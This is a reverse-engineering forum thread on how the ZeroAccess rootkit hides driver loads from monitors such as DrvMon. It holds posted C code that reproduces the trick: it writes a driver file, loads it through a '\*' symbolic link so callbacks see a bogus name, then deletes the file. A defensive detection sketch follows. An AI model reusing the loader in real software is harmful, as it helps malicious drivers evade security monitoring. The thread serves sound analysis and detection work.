A forum for reverse engineering, OS internals and malware analysis
kmd wrote:
When will the next version be published? Soon a year will have passed since this.

We decided not to release the newer version (2.x) to the public. Overall it is now a completely different application from the one attached here. This kind of spoofing is not handled by the currently available 1.2 version, nor is load-from-header.
All of these are resolved in v2.0, which has been ready for about a month.
Brock wrote:
Haven't followed this thread in forever, but now I have seen talk of this Zero Access Trojan/RK "spoofing" the ImageInfo->FileName UNICODE_STRING? I don't have a sample of this, but wouldn't this driver logically still need to be loaded prior to DrvMon running and other such tools??? Anyhow, instead of using ImageInfo->FileName directly one could, if the ExtendedInfoPresent flag in the passed ImageInfo is set, use the IMAGE_INFO_EX structure instead, which provides a FILE_OBJECT pointer to the driver; ObQueryNameString on the file object pointer and the driver name should be revealed? Of course, this could be "spoofed" too, but perhaps with more work? My suggested bypass doesn't need "kernel mode" help; it is a PE optional header structure member that changes and complicates things, so I am curious to see what ZA is doing. Reverser comments welcomed ;)
/* Posted loader reproducing the ZeroAccess trick: the driver file is written to
   system32\drivers, but it is loaded through an object-manager symbolic link named
   "\*" that points at that file, so a load-image callback receives "\*" as
   ImageInfo->FileName instead of the real path. tmpBuffer, BUFFER_SIZE,
   NativeWriteBufferToFile and NativeLoadDriver belong to the poster's project and
   are not shown; the Nt* prototypes come from the poster's ntdll declarations. */
BOOL LoadDriverZAccess(
    PWSTR DriverName,
    PWSTR RegistryPath,
    PBYTE BinaryBuffer,
    ULONG BinaryBufferSize,
    PNTSTATUS pStatus
    )
{
    BOOL result = FALSE;
    NTSTATUS ns = STATUS_UNSUCCESSFUL;
    UNICODE_STRING drvname;
    UNICODE_STRING str1;
    OBJECT_ATTRIBUTES attr;
    HANDLE Link;

    __try {
        /* Build "\??\<system dir>\drivers\<DriverName>" in the shared buffer.
           Note that DriverName is not length-checked against BUFFER_SIZE. */
        RtlSecureZeroMemory(tmpBuffer, BUFFER_SIZE);
        wcscpy(tmpBuffer, L"\\??\\");
        if (GetSystemDirectory(&tmpBuffer[4], MAX_PATH)) {
            wcscat(tmpBuffer, L"\\drivers\\");
            wcscat(tmpBuffer, DriverName);

            /* Write the driver image to disk (path without the "\??\" prefix). */
            ns = (NTSTATUS)NativeWriteBufferToFile(
                &tmpBuffer[4],
                BinaryBuffer,
                BinaryBufferSize,
                FALSE,
                FALSE
                );

            if (NT_SUCCESS(ns)) {
                /* Create the symbolic link object "\*" -> "\??\...\drivers\<name>". */
                RtlInitUnicodeString(&str1, L"\\*");
                RtlInitUnicodeString(&drvname, tmpBuffer);
                InitializeObjectAttributes(&attr, &str1, OBJ_CASE_INSENSITIVE, 0, NULL);
                ns = NtCreateSymbolicLinkObject(&Link, SYMBOLIC_LINK_ALL_ACCESS, &attr, &drvname);
                if (NT_SUCCESS(ns)) {
                    /* Load the driver by the link name, so "\*" is what the loader reports. */
                    ns = NativeLoadDriver(TEXT("\\*"), RegistryPath, NULL);
                    result = NT_SUCCESS(ns);
                    /* The link is temporary; closing the last handle removes it. */
                    NtClose(Link);
                }

                /* Remove the on-disk image once the driver is loaded (or loading failed). */
                RtlInitUnicodeString(&drvname, tmpBuffer);
                InitializeObjectAttributes(&attr, &drvname, OBJ_CASE_INSENSITIVE, 0, NULL);
                NtDeleteFile(&attr);
            }
        }
        if (pStatus)
            *pStatus = ns;
    } __except (EXCEPTION_EXECUTE_HANDLER) {
        result = FALSE;
    }
    return result;
}
IMAGE_INFO_EX is unavailable prior to Vista.

Yes, I am aware of this, as I still run XP 32-bit natively, but even now Vista is old too :lol:
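The check Brock proposes, applied to the "\*" link the posted LoadDriverZAccess() creates, as an added user-mode model that is not part of this thread or of DrvMon: the name a load-image callback is handed is followed through object-manager symbolic links and compared with the path obtained from the file object. The link table, the file name zaccess.sys and the functions resolve_nt_path/image_name_matches_file are constructed for the example; a real tool would read the links with NtOpenSymbolicLinkObject/NtQuerySymbolicLinkObject and the file name with ObQueryNameString.

```c
#include <stdbool.h>
#include <wchar.h>
#include <wctype.h>
#define NT_PATH_MAX 260
/* Constructed stand-in for the object-manager symbolic links a real tool would read
 * with NtOpenSymbolicLinkObject/NtQuerySymbolicLinkObject; "\*" mirrors the posted code. */
struct nt_symlink { const wchar_t *name; const wchar_t *target; };
static const struct nt_symlink links[] = {
    { L"\\*",          L"\\??\\C:\\Windows\\system32\\drivers\\zaccess.sys" },
    { L"\\SystemRoot", L"\\Device\\HarddiskVolume1\\Windows" },
    { L"\\??\\C:",     L"\\Device\\HarddiskVolume1" },
};
/* Case-insensitive match of prefix p at the start of s; returns its length, or 0. */
static size_t prefix_ci(const wchar_t *s, const wchar_t *p)
{
    size_t i = 0;
    while (p[i] && s[i] && towlower(s[i]) == towlower(p[i])) i++;
    return p[i] ? 0 : i;
}
/* Follow leading symbolic links until the name starts at a device object, as the object
 * manager does on open. Returns links followed, or -1 on overflow or a cycle (>8 hops). */
int resolve_nt_path(const wchar_t *name, wchar_t *out, size_t cap)
{
    wchar_t cur[NT_PATH_MAX], next[NT_PATH_MAX];
    int hops = 0;
    if (wcslen(name) >= NT_PATH_MAX) return -1;
    wcscpy(cur, name);
    for (size_t i = 0; i < sizeof links / sizeof links[0]; ) {
        size_t n = prefix_ci(cur, links[i].name);
        if (!n || (cur[n] != L'\\' && cur[n] != 0)) { i++; continue; }  /* component boundary only */
        if (++hops > 8 || wcslen(links[i].target) + wcslen(cur + n) >= NT_PATH_MAX) return -1;
        wcscpy(next, links[i].target);
        wcscat(next, cur + n);
        wcscpy(cur, next);
        i = 0;  /* the rewritten name may itself start with another link */
    }
    if (wcslen(cur) >= cap) return -1;
    wcscpy(out, cur);
    return hops;
}
/* The check proposed in the thread: trust FullImageName only if it resolves to the
 * same device path as the name obtained from IMAGE_INFO_EX.FileObject. */
bool image_name_matches_file(const wchar_t *image_name, const wchar_t *file_name)
{
    wchar_t a[NT_PATH_MAX], b[NT_PATH_MAX];
    if (resolve_nt_path(image_name, a, NT_PATH_MAX) < 0 || resolve_nt_path(file_name, b, NT_PATH_MAX) < 0)
        return false;
    return wcslen(a) == wcslen(b) && prefix_ci(a, b) == wcslen(a);
}
```

The hop count is worth surfacing in a monitor: a normal ImagePath goes through one link (\??\ or \SystemRoot), whereas "\*" takes two and goes through a link that no legitimate driver install creates.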